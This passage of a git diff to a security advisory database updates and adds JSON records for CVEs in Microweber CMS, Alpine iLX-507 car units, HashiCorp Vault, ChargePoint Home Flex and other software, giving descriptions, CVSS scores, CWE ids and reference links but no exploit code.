advisories/unreviewed/2025/08/GHSA-fmp3-xxcc-559c/GHSA-fmp3-xxcc-559c.json create mode 100644 advisories/unreviewed/2025/08/GHSA-h64g-vgvx-2m8r/GHSA-h64g-vgvx-2m8r.json create mode 100644 advisories/unreviewed/2025/08/GHSA-j7gx-cwm7-5mxg/GHSA-j7gx-cwm7-5mxg.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mxg3-45rj-wpf7/GHSA-mxg3-45rj-wpf7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-p3q2-74hc-43v3/GHSA-p3q2-74hc-43v3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q2v9-7453-3jwf/GHSA-q2v9-7453-3jwf.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q8q3-6g93-33hh/GHSA-q8q3-6g93-33hh.json create mode 100644 advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json create mode 100644 advisories/unreviewed/2025/08/GHSA-qgm9-fp3r-vm5v/GHSA-qgm9-fp3r-vm5v.json create mode 100644 advisories/unreviewed/2025/08/GHSA-qh7w-62mf-364r/GHSA-qh7w-62mf-364r.json create mode 100644 advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json create mode 100644 advisories/unreviewed/2025/08/GHSA-rpv2-rq4j-p9m3/GHSA-rpv2-rq4j-p9m3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xfj7-2jg6-3957/GHSA-xfj7-2jg6-3957.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xfxw-gr8g-6h57/GHSA-xfxw-gr8g-6h57.json diff --git a/advisories/unreviewed/2024/11/GHSA-g8j6-3mwg-7x4g/GHSA-g8j6-3mwg-7x4g.json b/advisories/unreviewed/2024/11/GHSA-g8j6-3mwg-7x4g/GHSA-g8j6-3mwg-7x4g.json index 7423dad5aef25..e0af685aa74fd 100644 --- a/advisories/unreviewed/2024/11/GHSA-g8j6-3mwg-7x4g/GHSA-g8j6-3mwg-7x4g.json +++ b/advisories/unreviewed/2024/11/GHSA-g8j6-3mwg-7x4g/GHSA-g8j6-3mwg-7x4g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g8j6-3mwg-7x4g", - "modified": "2024-11-18T18:30:57Z", + "modified": "2025-08-01T18:31:10Z", "published": "2024-11-18T18:30:57Z", "aliases": [ "CVE-2021-1440" @@ -18,6 +18,22 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1440" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-webui-gQLSFyPM" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-sma-info-disclo-VOu2GHbZ" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-sigverbypass-gPYXd6Mk" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrbgp-rpki-dos-gvmjqxbk" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/03/GHSA-4fj4-9m67-3mj3/GHSA-4fj4-9m67-3mj3.json b/advisories/unreviewed/2025/03/GHSA-4fj4-9m67-3mj3/GHSA-4fj4-9m67-3mj3.json index 3ccaea824226c..12509aae95d25 100644 --- a/advisories/unreviewed/2025/03/GHSA-4fj4-9m67-3mj3/GHSA-4fj4-9m67-3mj3.json +++ b/advisories/unreviewed/2025/03/GHSA-4fj4-9m67-3mj3/GHSA-4fj4-9m67-3mj3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4fj4-9m67-3mj3", - "modified": "2025-03-28T18:33:36Z", + "modified": "2025-08-01T18:31:13Z", "published": "2025-03-28T18:33:36Z", "aliases": [ "CVE-2025-2713" ], "details": "Google gVisor's runsc component exhibited a local privilege escalation vulnerability due to incorrect handling of file access permissions, which allowed unprivileged users to access restricted files. This occurred because the process initially ran with root-like permissions until the first fork.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/03/GHSA-pr9m-r5mr-v22j/GHSA-pr9m-r5mr-v22j.json b/advisories/unreviewed/2025/03/GHSA-pr9m-r5mr-v22j/GHSA-pr9m-r5mr-v22j.json index 331a5f48996b0..30ee515728943 100644 --- a/advisories/unreviewed/2025/03/GHSA-pr9m-r5mr-v22j/GHSA-pr9m-r5mr-v22j.json +++ b/advisories/unreviewed/2025/03/GHSA-pr9m-r5mr-v22j/GHSA-pr9m-r5mr-v22j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pr9m-r5mr-v22j", - "modified": "2025-03-27T00:31:49Z", + "modified": "2025-08-01T18:31:12Z", "published": "2025-03-27T00:31:49Z", "aliases": [ "CVE-2025-20230" diff --git a/advisories/unreviewed/2025/04/GHSA-g2ph-wvc2-ph4v/GHSA-g2ph-wvc2-ph4v.json b/advisories/unreviewed/2025/04/GHSA-g2ph-wvc2-ph4v/GHSA-g2ph-wvc2-ph4v.json index 6eb8bcfd44e7c..fd049f4359c4a 100644 --- a/advisories/unreviewed/2025/04/GHSA-g2ph-wvc2-ph4v/GHSA-g2ph-wvc2-ph4v.json +++ b/advisories/unreviewed/2025/04/GHSA-g2ph-wvc2-ph4v/GHSA-g2ph-wvc2-ph4v.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g2ph-wvc2-ph4v", - "modified": "2025-04-14T18:31:49Z", + "modified": "2025-08-01T18:31:14Z", "published": "2025-04-14T18:31:49Z", "aliases": [ "CVE-2025-3277" ], "details": "An integer overflow can be triggered in SQLite’s `concat_ws()` function. The resulting, truncated integer is then used to allocate a buffer. When SQLite then writes the resulting string to the buffer, it uses the original, untruncated size and thus a wild Heap Buffer overflow of size ~4GB can be triggered. This can result in arbitrary code execution.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-190" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-fjrg-q598-j558/GHSA-fjrg-q598-j558.json b/advisories/unreviewed/2025/07/GHSA-fjrg-q598-j558/GHSA-fjrg-q598-j558.json index 6bb0879802850..98f717321badf 100644 --- a/advisories/unreviewed/2025/07/GHSA-fjrg-q598-j558/GHSA-fjrg-q598-j558.json +++ b/advisories/unreviewed/2025/07/GHSA-fjrg-q598-j558/GHSA-fjrg-q598-j558.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-502" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-jff4-5h8q-wpxm/GHSA-jff4-5h8q-wpxm.json b/advisories/unreviewed/2025/07/GHSA-jff4-5h8q-wpxm/GHSA-jff4-5h8q-wpxm.json index b0bd5e4abf36e..3d0cc08aea5da 100644 --- a/advisories/unreviewed/2025/07/GHSA-jff4-5h8q-wpxm/GHSA-jff4-5h8q-wpxm.json +++ b/advisories/unreviewed/2025/07/GHSA-jff4-5h8q-wpxm/GHSA-jff4-5h8q-wpxm.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-xv2q-4cq2-h5pc/GHSA-xv2q-4cq2-h5pc.json b/advisories/unreviewed/2025/07/GHSA-xv2q-4cq2-h5pc/GHSA-xv2q-4cq2-h5pc.json index a6c5d2ac9e2f0..bbff68dd2a05a 100644 --- a/advisories/unreviewed/2025/07/GHSA-xv2q-4cq2-h5pc/GHSA-xv2q-4cq2-h5pc.json +++ b/advisories/unreviewed/2025/07/GHSA-xv2q-4cq2-h5pc/GHSA-xv2q-4cq2-h5pc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xv2q-4cq2-h5pc", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-08-01T18:31:16Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43276" ], "details": "A logic error was addressed with improved error handling. This issue is fixed in macOS Sequoia 15.6. iCloud Private Relay may not activate when more than one user is logged in at the same time.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:38Z" diff --git a/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json b/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json new file mode 100644 index 0000000000000..c94437cbf4848 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-2x2j-3c2v-g3c2/GHSA-2x2j-3c2v-g3c2.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x2j-3c2v-g3c2", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-51504" + ], + "details": "Microweber CMS 2.0 is vulnerable to Cross Site Scripting (XSS)in the /projects/profile, homepage endpoint via the last name field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51504" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51504" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BLive%20Panel%5D%20Stored%20XSS%20in%20profile%20path.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-64m7-3j89-3cj8/GHSA-64m7-3j89-3cj8.json b/advisories/unreviewed/2025/08/GHSA-64m7-3j89-3cj8/GHSA-64m7-3j89-3cj8.json new file mode 100644 index 0000000000000..a7f520cab9d9b --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-64m7-3j89-3cj8/GHSA-64m7-3j89-3cj8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64m7-3j89-3cj8", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8474" + ], + "details": "Alpine iLX-507 CarPlay Stack-based Buffer Overflow Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the Apple CarPlay protocol. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26318.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8474" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-763" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json b/advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json new file mode 100644 index 0000000000000..dec6b605c68a5 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-6c5r-4wfc-3mcx/GHSA-6c5r-4wfc-3mcx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6c5r-4wfc-3mcx", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6037" + ], + "details": "Vault and Vault Enterprise (“Vault”) TLS certificate auth method did not correctly validate client certificates when configured with a non-CA certificate as [+trusted certificate+|https://developer.hashicorp.com/vault/api-docs/auth/cert#certificate]. In this configuration, an attacker may be able to craft a malicious certificate that could be used to impersonate another user. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6037" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-18-vault-certificate-auth-method-did-not-validate-common-name-for-non-ca-certificates/76037" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json b/advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json new file mode 100644 index 0000000000000..8cb8685f380d8 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-6h4p-m86h-hhgh/GHSA-6h4p-m86h-hhgh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h4p-m86h-hhgh", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-5999" + ], + "details": "A privileged Vault operator with write permissions to the root namespace’s identity endpoint could escalate their own or another user’s token privileges to Vault’s root policy. Fixed in Vault Community Edition 1.20.0 and Vault Enterprise 1.20.0, 1.19.6, 1.18.11 and 1.16.22.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5999" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-7w87-cwwm-qff7/GHSA-7w87-cwwm-qff7.json b/advisories/unreviewed/2025/08/GHSA-7w87-cwwm-qff7/GHSA-7w87-cwwm-qff7.json new file mode 100644 index 0000000000000..d54d2eb9d6b5d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7w87-cwwm-qff7/GHSA-7w87-cwwm-qff7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w87-cwwm-qff7", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-45150" + ], + "details": "Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive files via supplying a crafted request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45150" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ycshao12/69a48551cc6c9cc69153d137afe9ecef" + }, + { + "type": "WEB", + "url": "https://github.com/X-D-Lab/LangChain-ChatGLM-Webui" + }, + { + "type": "WEB", + "url": "http://langchain-chatglm-webui.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8258-pcw6-7gfq/GHSA-8258-pcw6-7gfq.json b/advisories/unreviewed/2025/08/GHSA-8258-pcw6-7gfq/GHSA-8258-pcw6-7gfq.json new file mode 100644 index 0000000000000..a0f4c06120fce --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8258-pcw6-7gfq/GHSA-8258-pcw6-7gfq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8258-pcw6-7gfq", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-8472" + ], + "details": "Alpine iLX-507 vCard Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. User interaction is required to exploit this vulnerability in that the target must connect to a malicious Bluetooth device.\n\nThe specific flaw exists within the parsing of vCard data. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of root. Was ZDI-CAN-26316.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8472" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-761" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json b/advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json new file mode 100644 index 0000000000000..2434332e9361a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8357-fjvx-xrm8/GHSA-8357-fjvx-xrm8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8357-fjvx-xrm8", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-51501" + ], + "details": "Reflected Cross-Site Scripting (XSS) in the id parameter of the live_edit.module_settings API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51501" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51501" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BAdmin%20Panel%5D%20Reflected%20XSS%20on%20id%20parameter.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8x5q-fmc6-r74x/GHSA-8x5q-fmc6-r74x.json b/advisories/unreviewed/2025/08/GHSA-8x5q-fmc6-r74x/GHSA-8x5q-fmc6-r74x.json new file mode 100644 index 0000000000000..eb0a8c3e1eb02 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8x5q-fmc6-r74x/GHSA-8x5q-fmc6-r74x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8x5q-fmc6-r74x", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8477" + ], + "details": "Alpine iLX-507 vCard Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Alpine iLX-507 devices. User interaction is required to exploit this vulnerability in that the target must connect to a malicious Bluetooth device.\n\nThe specific flaw exists within the parsing of vCard data. The issue results from the lack of proper validation of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26324.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8477" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-767" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-9847-xprf-x456/GHSA-9847-xprf-x456.json b/advisories/unreviewed/2025/08/GHSA-9847-xprf-x456/GHSA-9847-xprf-x456.json new file mode 100644 index 0000000000000..1a7e7d9fa67f0 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-9847-xprf-x456/GHSA-9847-xprf-x456.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9847-xprf-x456", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8480" + ], + "details": "Alpine iLX-507 Command Injection Remote Code Execution. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the Tidal music streaming application. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-26357.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8480" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-766" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-99rf-9fx6-652g/GHSA-99rf-9fx6-652g.json b/advisories/unreviewed/2025/08/GHSA-99rf-9fx6-652g/GHSA-99rf-9fx6-652g.json new file mode 100644 index 0000000000000..e31f5bdf93d9b --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-99rf-9fx6-652g/GHSA-99rf-9fx6-652g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99rf-9fx6-652g", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8473" + ], + "details": "Alpine iLX-507 UPDM_wstpCBCUpdStart Command Injection Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the UPDM_wstpCBCUpdStart function. The issue results from the lack of proper validation of user-supplied data before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26317.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:P/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8473" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-762" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-cg36-rxhq-p3j7/GHSA-cg36-rxhq-p3j7.json b/advisories/unreviewed/2025/08/GHSA-cg36-rxhq-p3j7/GHSA-cg36-rxhq-p3j7.json new file mode 100644 index 0000000000000..c9bca788d9949 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-cg36-rxhq-p3j7/GHSA-cg36-rxhq-p3j7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg36-rxhq-p3j7", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8475" + ], + "details": "Alpine iLX-507 AVRCP Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. User interaction is required to exploit this vulnerability in that the target must connect to a malicious Bluetooth device.\n\nThe specific flaw exists within the implementation of the AVRCP protocol. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26321.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8475" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-764" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json b/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json new file mode 100644 index 0000000000000..43cc919f51ef6 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvrx-jhp7-38jf", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-54564" + ], + "details": "uploadsm in ChargePoint Home Flex 5.5.4.13 does not validate a user-controlled string for bz2 decompression, which allows command execution as the nobody user.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54564" + }, + { + "type": "WEB", + "url": "https://github.com/koharin/CVE/blob/main/CVE-2025-54564" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-fjwp-5xr6-hvh5/GHSA-fjwp-5xr6-hvh5.json 